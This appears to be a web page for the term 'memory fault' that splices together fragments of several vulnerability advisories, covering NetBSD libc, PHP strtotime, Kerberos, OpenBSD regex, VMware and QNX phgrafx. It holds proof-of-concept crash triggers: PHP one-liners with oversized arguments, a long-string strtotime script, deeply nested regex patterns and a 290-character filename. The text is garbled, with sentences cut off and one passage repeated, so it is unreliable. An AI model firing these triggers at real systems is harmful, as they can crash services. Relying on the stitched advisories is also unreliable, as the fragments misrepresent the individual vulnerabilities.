| New User, Welcome! Login |
memory fault
As the processor switches between user and kernel level, a number of
checks are performed in order to implement the privilege protection
system. If the processor detects a problem while attempting to switch
privilege levels it generates a trap - typically general protection
fault (GPF). In that case, the processor aborts the return to the
user level process and re-enters the kernel. The FreeBSD kernel
allows the user process to be notified of such an event by a signal
(SIGSEGV or SIGBUS).
II. Problem Description
--- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow ---
The main problem exists in files like getservbyname_r.c and getservbyport_r.c. Functions getservbyname*(3), getservbyport*(3) and getaddrinfo(3) of NetBSD libc implementation, provides to possible buffer overflow. To demonstrate this issue, we may use PHP as an attack vector.
127# php -r 'getservbyname("A",str_repeat("A",7108));'
127# php -r 'getservbyname("A",str_repeat("A",7109));'
Memory fault (core dumped)
-php-5.3.6/ext/standard/basic_functions.c---
PHP_FUNCTION(getservbyname)
{
char *name, *proto;
An unauthenticated remote attacker can, by inducing the decryption of
an invalid AES or RC4 ciphertext, cause a crash or heap corruption,
or, under extraordinarily unlikely conditions, arbitrary code
execution. A successful code-execution attack against a KDC can
compromise all services relying on that KDC for authentication.
However, the most probable outcome is a crash due to a memory fault or
abort() call. An attacker with a valid account in the relevant
Kerberos realm has a marginally higher chance of success to execute
arbitrary code, but the probability is still very low. Therefore, the
given Confidentiality Impact and Integrity Impact metrics of
"Complete" represent theoretical worst-case scenarios and are both
<?php
$strx=str_repeat("A",$argv[1]);
var_dump(strtotime($strx));
?>127#
127# /cxib/5371/build/bin/php /www/strtotime.php 33388888
Memory fault (core dumped)
127# gdb -q /cxib/5371/build/bin/php
(gdb) r /www/strtotime.php 33388888
Starting program: /cxib/5371/build/bin/php /www/strtotime.php 33388888
pattern1:
./poc '(.?)((((.*){1,100}){1,100}){1,100}){1,100}'
pattern2:
./poc '(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}'
Memory fault (core dumped)
gdb openbsd 4.9:
1275 (void) memcpy((char *)(p->strip + p->slen),
(gdb) print p->slen
$14 = 218103912
(gdb) print start
address in which the 16 most significant bits each equal bit 47, or in
other words, a 48-bit address properly sign-extended to 64 bits. Any
other address is non-canonical.
If an indirect jump ("JMP mem") attempts to transfer execution to a
non-canonical RIP, a proper CPU will raise a general protection fault
(#GP) at the address of the JMP instruction, before executing the
instruction. Affected versions of VMware, on the other hand, will
improperly execute the instruction, which assigns a non-canonical
address to RIP, and will then raise a #GP fault because RIP is
non-canonical. Therefore, when the #GP handler is invoked, it will
address in which the 16 most significant bits each equal bit 47, or in
other words, a 48-bit address properly sign-extended to 64 bits. Any
other address is non-canonical.
If an indirect jump ("JMP mem") attempts to transfer execution to a
non-canonical RIP, a proper CPU will raise a general protection fault
(#GP) at the address of the JMP instruction, before executing the
instruction. Affected versions of VMware, on the other hand, will
improperly execute the instruction, which assigns a non-canonical
address to RIP, and will then raise a #GP fault because RIP is
non-canonical. Therefore, when the #GP handler is invoked, it will
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
Memory fault (core dumped)
#
IV. Solution
According to the vendor's response:
|
|
|
